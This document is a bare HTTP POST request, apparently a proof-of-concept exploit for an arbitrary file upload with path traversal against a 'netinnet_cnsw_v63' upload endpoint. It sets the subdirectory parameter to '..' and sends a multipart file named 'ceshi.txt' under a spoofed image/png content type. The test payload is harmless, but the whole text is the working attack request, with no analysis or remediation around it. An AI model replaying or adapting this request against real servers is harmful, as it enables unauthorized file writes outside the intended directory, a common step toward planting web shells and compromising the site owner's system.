POST /netinnet_cnsw_v63/douploaddatafile?fm_subdir=.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 180
Origin: null
Content-Type: multipart/form-data; boundary=----GgbfgihbhbfkjdnjhdbfjHBJBDKJHBK
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

------GgbfgihbhbfkjdnjhdbfjHBJBDKJHBK
Content-Disposition: form-data; name="xmlFile"; filename="ceshi.txt"
Content-Type: image/png

Hello World!
------GgbfgihbhbfkjdnjhdbfjHBJBDKJHBK--